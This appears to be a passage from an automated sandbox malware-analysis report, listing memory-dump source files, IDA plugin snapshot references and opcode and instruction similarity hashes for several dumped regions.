                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852586898.0000000006050000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852612854.0000000006052000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852648161.0000000006056000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852726936.000000000605A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_6050000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a76593e62e6e37febcabd87cd19a8b2f2b91a2df878db32fde3f0386a9ccef6c
                                                                                                                                                                                                                                                                • Instruction ID: 964c92e20571a31f4bca9062447c2854c44df39d75ec4189d7cf7e72aa34903b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a76593e62e6e37febcabd87cd19a8b2f2b91a2df878db32fde3f0386a9ccef6c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D251F27295C7D15FD713CF7488A129ABFE0AE1720071986DEC1E18B5A3D324A056E792
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852586898.0000000006050000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852612854.0000000006052000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852648161.0000000006056000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852726936.000000000605A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_6050000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 3e1e686f1ee32d8461c749d0439a3d2eb0902c2acd604de9368c88845df2db34
                                                                                                                                                                                                                                                                • Instruction ID: 26aa5770ae370e2abfac8f6e239dcbe4e85c027adafa602c78dd017a90e441b3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e1e686f1ee32d8461c749d0439a3d2eb0902c2acd604de9368c88845df2db34
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57416CF250C200AFE345AF55E9416BEFBE9EFD4730F22892DE1C582610D37889458A66
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852586898.0000000006050000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852612854.0000000006052000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852648161.0000000006056000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852726936.000000000605A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_6050000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: e1c0c61b6df58849699e5bf8af6cdc950f3d21093b1203005e3df1aa5465f2f3
                                                                                                                                                                                                                                                                • Instruction ID: 52eb0ed9c222e28c255732235829806f8d4fa0f6ea894441788283eeefd46510
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1c0c61b6df58849699e5bf8af6cdc950f3d21093b1203005e3df1aa5465f2f3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0415BB250C200AFE345AF55E9416BEFBE9EFD4730F22892EE1C582610D77889458A67
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852586898.0000000006050000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852612854.0000000006052000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852648161.0000000006056000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852726936.000000000605A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_6050000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 6d4d61ebb5243cbf9a1c270df9c6e45fc182f229b54ae7963c2bea8637723d13
                                                                                                                                                                                                                                                                • Instruction ID: dfe2712175f5b26d684bc5c216dd3ac612f47c5d0d2b45fedc0cac1ece4819d3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d4d61ebb5243cbf9a1c270df9c6e45fc182f229b54ae7963c2bea8637723d13
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5E0E5765489A06DE202AA065E90BFBBF6CE785A30F20806AF90683601C3A418085671
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852586898.0000000006050000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852612854.0000000006052000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852648161.0000000006056000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852726936.000000000605A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_6050000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 3441e54f650a3521b970f0f9cb93ac0967ea842328aae6106bb50c102f6c4c49
                                                                                                                                                                                                                                                                • Instruction ID: 5a5d91aea355c121637cf2350521313e7c4f554e76b8255342bc3b6542e22b6f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3441e54f650a3521b970f0f9cb93ac0967ea842328aae6106bb50c102f6c4c49
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46E08C76104101AEDB00AF64C84999FFBF8FF59321F21984AF884CB726C3398D41CB2A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852586898.0000000006050000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852612854.0000000006052000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852648161.0000000006056000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852726936.000000000605A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_6050000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: eaac31e51c0dc6fff3656fb1a1356f240b2029dd5d757d613bcc31bc9b5717c5
                                                                                                                                                                                                                                                                • Instruction ID: a3af37c4d5e60b461e70e2570550655d7d165f1d3c559017037b9e8ae5a84391
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaac31e51c0dc6fff3656fb1a1356f240b2029dd5d757d613bcc31bc9b5717c5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6B012F2AECF70E4DB97267A6DF2779BB0C0B82400D0689EF9206264C2C942D0064283